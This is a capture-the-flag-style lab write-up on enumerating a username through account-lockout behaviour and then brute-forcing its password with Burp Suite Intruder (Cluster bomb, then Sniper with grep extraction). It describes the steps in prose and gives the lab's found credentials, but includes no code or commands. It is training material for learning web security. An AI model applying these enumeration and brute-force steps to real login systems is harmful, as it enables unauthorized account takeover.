Username enumeration via account lock

In this lab we will exploit a logic flaw in account lockout. We have to enumerate a valid username and brute-force is password, like in the previous labs.

To solve this lab we will follow the same process of intercepting the login request with burp suit and sending it to intruder. This time, we need to cause the usernames to be repeated 5 times and observe which username returns a longer response.

Before executing an attack, to make sure every username is repeated 5 times, we need to add an arbitrary additional parameter to the end of the request and add a second payload position to it. We also need to use the Cluster bomb attack type to iterate through each payload set in turn.

Once the attack is finished we can notice that the username "academico" has a different length response, and instead of the "Invalid username or password", it has a different error message.

Now that we found the potential valid username, we can now perform a sniper attack to find the password with the passwords wordlist. Similar to a previous lab, we will set and create a grep extraction rule for the error message in order to find the correct password.

In the attack, all of the passwords throwed that same error, except the password "dallas", which ended being the correct password for the username "academico".

PreviousBroken brute-force protection, IP block NextBroken brute-force protection, multiple credentials per request

Last updated 4 years ago